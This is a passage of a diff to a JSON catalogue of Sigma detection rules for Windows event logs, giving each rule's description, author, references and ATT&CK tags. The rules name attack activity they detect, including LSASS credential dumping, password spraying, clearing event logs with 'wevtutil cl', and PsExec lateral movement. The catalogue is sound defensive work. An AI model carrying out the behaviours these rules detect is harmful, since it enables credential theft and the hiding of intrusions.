"win_codeintergiry_blocked_driver_load.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/wdormann/status/1590434950335320065", - "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintergiry_blocked_driver_load.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ] - }, - "uuid": "e4be5675-4a53-426a-8c81-a8bb2387e947", - "value": "Code Integrity Blocked Driver Load" - }, - { - "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/14", - "falsepositive": [ - "Legitimate package hosted on a known and authorized remote location" - ], - "filename": "win_diagnosis_scripted_load_remote_diagcab.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/nas_bench/status/1539679555908141061", - "https://twitter.com/j00sean/status/1537750439701225472", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "50cb47b8-2c33-4b23-a2e9-4600657d9746", - "value": "Loading Diagcab Package From Remote Path" - }, - { - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "meta": { - "author": "Tim Burrell", - "creation_date": "2020/02/07", - "falsepositive": [ - "Unknown" - ], - "filename": "win_apt_gallium.yml", - "level": "high", - 
"logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_apt_gallium.yml" - ], - "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1071" - ] - }, - "uuid": "3db10f25-2527-4b79-8d4b-471eb900ee29", - "value": "GALLIUM Artefacts - Builtin" - }, - { - "description": "This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/05/08", - "falsepositive": [ - "Unknown" - ], - "filename": "win_susp_dns_config.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", - "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", - "https://twitter.com/gentilkiwi/status/861641945944391680", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_susp_dns_config.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "cbe51394-cd93-4473-b555-edf0144952d9", - "value": "DNS Server Error Failed Loading the ServerLevelPluginDLL" - }, - { - "description": "Detects plugged USB devices", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/11/09", - "falsepositive": [ - "Legitimate administrative activity" - ], - "filename": "win_usb_device_plugged.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/", - 
"https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1200" - ] - }, - "uuid": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", - "value": "USB Device Plugged" - }, - { - "description": "A rule has been modified in the Windows Firewall exception list", - "meta": { - "author": "frack113", - "creation_date": "2022/02/19", - "falsepositive": "No established falsepositives", - "filename": "win_firewall_as_add_rule.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml" - ], - "tags": "No established tags" - }, - "uuid": "cde0a575-7d3d-4a49-9817-b8004a7bf105", - "value": "Added Rule in Windows Firewall with Advanced Security" - }, { "description": "A rule has been modified in the Windows Firewall exception list", "meta": { 
@@ -14279,7 +3506,6991 @@ "value": "Setting Change in Windows Firewall with Advanced Security" }, { - "description": "Detects possible Active Directory enumeration via LDAP", + "description": "A rule has been modified in the Windows Firewall exception list", + "meta": { + "author": "frack113", + "creation_date": "2022/02/19", + "falsepositive": "No established falsepositives", + "filename": "win_firewall_as_add_rule.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml" + ], + "tags": "No established tags" + }, + "uuid": "cde0a575-7d3d-4a49-9817-b8004a7bf105", + "value": "Added Rule in Windows Firewall with Advanced Security" + }, + { + "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. 
Apply this Sigma Use Case on your windows server logs and not on your DC logs.", + "meta": { + "author": "Patrick Bareiss", + "creation_date": "2019/04/18", + "falsepositive": [ + "Domain Controller Logs", + "Local accounts managed by privileged account management tools" + ], + "filename": "win_security_user_creation.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ] + }, + "uuid": "66b6be3d-55d0-4f47-9855-d69df21740ea", + "value": "Local User Creation" + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "7a922f1b-2635-4d6c-91ef-af228b198ad3", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security" + }, + { + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. 
Possible Rubeus tries to get a handle to LSA.", + "meta": { + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" + ] + }, + "uuid": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "value": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'" + }, + { + "description": "An attacker can use the SID history attribute to gain additional privileges.", + "meta": { + "author": "Thomas Patzke, @atc_project (improvements)", + "creation_date": "2017/02/19", + "falsepositive": [ + "Migration of an account into a new domain" + ], + "filename": "win_security_susp_add_sid_history.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=1772", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_sid_history.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1134.005" + ] + }, + "uuid": "2632954e-db1c-49cb-9936-67d1ef1d17d2", + "value": "Addition of SID History to Active Directory Object" + }, + { + "description": "Detects failed logins with multiple accounts from a single process on the system.", + "meta": { + "author": "Mauricio Velazco", + "creation_date": "2021/06/01", + "falsepositive": [ + "Terminal servers", + "Jump servers", + 
"Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_single_process.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://www.trimarcsecurity.com/single-post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_process.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "fe563ab6-ded4-4916-b49f-a3a8445fe280", + "value": "Multiple Users Failing to Authenticate from Single Process" + }, + { + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/01/10", + "falsepositive": [ + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" + ], + "filename": "win_security_susp_eventlog_cleared.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://twitter.com/deviouspolack/status/832535435960209408", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ] + }, + "uuid": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "value": "Security Eventlog Cleared" + }, + { + "description": "Detects the 
mount of ISO images on an endpoint", + "meta": { + "author": "Syed Hasan (@syedhasan009)", + "creation_date": "2021/05/29", + "falsepositive": [ + "Software installation ISO files" + ], + "filename": "win_security_iso_mount.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", + "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", + "https://twitter.com/MsftSecIntel/status/1257324139515269121", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", + "value": "ISO Image Mount" + }, + { + "description": "Detects service installation of different remote access tools software. 
These software are often abused by threat actors to perform", + "meta": { + "author": "Connor Martin, Nasreddine Bencherchali", + "creation_date": "2022/12/23", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_service_install_remote_access_software.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_install_remote_access_software.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "c8b00925-926c-47e3-beea-298fd563728e", + "value": "Remote Access Tool Services Have Been Installed - Security" + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", + "value": "Invoke-Obfuscation Via Use MSHTA - Security" + }, + { + "description": "Detects process handle on LSASS process with certain access mask", + "meta": { + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "creation_date": "2019/11/01", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason; update 
the whitelist with it" + ], + "filename": "win_security_susp_lsass_dump_generic.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml" + ], + "tags": [ + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" + ] + }, + "uuid": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "value": "Generic Password Dumper Activity on LSASS" + }, + { + "description": "Detects an installation of a device that is forbidden by the system policy", + "meta": { + "author": "frack113", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_device_installation_blocked.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423", + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_device_installation_blocked.yml" + ], + "tags": "No established tags" + }, + "uuid": "c9eb55c3-b468-40ab-9089-db2862e42137", + "value": "Device Installation Blocked" + }, + { + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "Unknown" + ], + "filename": 
"win_security_susp_psexec.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_psexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", + "value": "Suspicious PsExec Execution" + }, + { + "description": "Detects logon with \"Special groups\" and \"Special Privileges\" can be thought of as Administrator groups or privileges.", + "meta": { + "author": "frack113", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_admin_logon.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964", + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_logon.yml" + ], + "tags": "No established tags" + }, + "uuid": "94309181-d345-4cbf-b5fe-061769bdf9cb", + "value": "User with Privileges Logon" + }, + { + "description": "Detects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol.", + "meta": { + "author": "Mauricio Velazco", + "creation_date": "2021/06/01", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_single_source_ntlm2.yml", + "level": "medium", + 
"logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_ntlm2.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "56d62ef8-3462-4890-9859-7b41e541f8d5", + "value": "Invalid Users Failing To Authenticate From Single Source Using NTLM" + }, + { + "description": "The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions.", + "meta": { + "author": "Arun Chauhan", + "creation_date": "2021/10/04", + "falsepositive": [ + "Red team activity", + "Rare legitimate use by an administrator" + ], + "filename": "win_security_lolbas_execution_of_nltest.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/software/S0359/", + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lolbas_execution_of_nltest.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482", + "attack.t1018", + "attack.t1016" + ] + }, + "uuid": "eeb66bbb-3dde-4582-815a-584aee9fe6d1", + "value": "Correct Execution of Nltest.exe" + }, + { + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + 
"creation_date": "2021/08/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_aadhealth_mon_agent_regkey_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml", + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012" + ] + }, + "uuid": "ff151c33-45fa-475d-af4f-c2f93571f4fe", + "value": "Azure AD Health Monitoring Agent Registry Keys Access" + }, + { + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "meta": { + "author": "Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "creation_date": "2017/08/22", + "falsepositive": [ + "Unknown (data set is too small; further testing needed)" + ], + "filename": "win_security_wmi_persistence.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://twitter.com/mattifestation/status/899646620148539397", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" + ] + }, + "uuid": "f033f3f3-fd24-4995-97d8-a3bb17550a88", + "value": "WMI Persistence - Security" + }, + { + "description": "Detects the extraction of password protected ZIP archives. 
See the filename variable for more details on which file has been opened.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/09", + "falsepositive": [ + "Legitimate used of encrypted ZIP files" + ], + "filename": "win_security_susp_opened_encrypted_zip.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1523383197513379841", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml" + ], + "tags": "No established tags" + }, + "uuid": "00ba9da1-b510-4f6b-b258-8d338836180f", + "value": "Password Protected ZIP File Opened" + }, + { + "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + ], + "filename": "win_security_gpo_scheduledtasks.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/menasec1/status/1106899890377052160", + "https://www.secureworks.com/blog/ransomware-as-a-distraction", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml" + ], + "tags": [ + "attack.persistence", + "attack.lateral_movement", + "attack.t1053.005" + ] + }, + "uuid": "a8f29a7b-b137-4446-80a0-b804272f3da2", + "value": "Persistence and Execution at Scale via GPO Scheduled Task" + }, + { + "description": "Detects suspicious failed logins with different user accounts from a single source system", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/01/10", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems 
like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_single_source2.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source2.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": "6309ffc4-8fa2-47cf-96b8-a2f72e58e538", + "value": "Failed NTLM Logins with Different Accounts from Single Source System" + }, + { + "description": "Alerts on Metasploit host's authentications on the domain.", + "meta": { + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "creation_date": "2020/05/06", + "falsepositive": [ + "Linux hostnames composed of 16 characters." + ], + "filename": "win_security_metasploit_authentication.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_authentication.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "72124974-a68b-4366-b990-d30e0b2a190d", + "value": "Metasploit SMB Authentication" + }, + { + "description": "Detects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol.", + "meta": { + "author": "Mauricio Velazco, frack113", + "creation_date": "2021/06/01", + "falsepositive": [ + "Vulnerability scanners", + "Misconfigured systems", + "Remote administration tools", + "VPN terminators", + "Multiuser systems like Citrix server farms" + ], + "filename": "win_security_susp_failed_logons_single_source_kerberos3.yml", + "level": "medium", + 
"logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos3.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "bc93dfe6-8242-411e-a2dd-d16fa0cc8564", + "value": "Invalid Users Failing To Authenticate From Source Using Kerberos" + }, + { + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/03", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_security_diagtrack_eop_default_login_username.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "value": "DiagTrackEoP Default Login Username" + }, + { + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/05/31", + "falsepositive": [ + "Go utilities that use staaldraad awesome NTLM library" + ], + "filename": "win_security_alert_ruler.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624", + 
"https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427", + "https://github.com/sensepost/ruler", + "https://github.com/sensepost/ruler/issues/47", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" + ] + }, + "uuid": "24549159-ac1b-479c-8175-d42aea947cae", + "value": "Hacktool Ruler" + }, + { + "description": "Checks for event id 1102 which indicates the security event log was cleared.", + "meta": { + "author": "Saw Winn Naung", + "creation_date": "2021/08/15", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "win_security_event_log_cleared.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_event_log_cleared.yml" + ], + "tags": [ + "attack.t1070.001" + ] + }, + "uuid": "a122ac13-daf8-4175-83a2-72c387be339d", + "value": "Security Event Log Cleared" + }, + { + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "meta": { + "author": "Florian Roth, Daniil Yugoslavskiy, oscd.community (update)", + "creation_date": "2017/03/27", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_mal_service_installs.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://awakesecurity.com/blog/threat-hunting-for-paexec/", 
+ "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf", + "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "cb062102-587e-4414-8efa-dbe3c7bf19c6", + "value": "Malicious Service Installations" + }, + { + "description": "Detects execution of Impacket's psexec.py.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2020/12/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_impacket_psexec.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_psexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "32d56ea1-417f-44ff-822b-882873f5f43b", + "value": "Impacket PsExec Execution" + }, + { + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "meta": { + "author": "Florian Roth, Bartlomiej Czyz (@bczyz1)", + "creation_date": "2019/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_apt_slingshot.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/apt-slingshot/84312/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_slingshot.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.s0111" + ] + }, + "uuid": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", + "value": "Defrag 
Deactivation - Security" + }, + { + "description": "Detects remote service activity via remote access to the svcctl named pipe", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_svcctl_remote_service.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_svcctl_remote_service.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.persistence", + "attack.t1021.002" + ] + }, + "uuid": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", + "value": "Remote Service Activity via SVCCTL Named Pipe" + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + ], + "tags": [ + 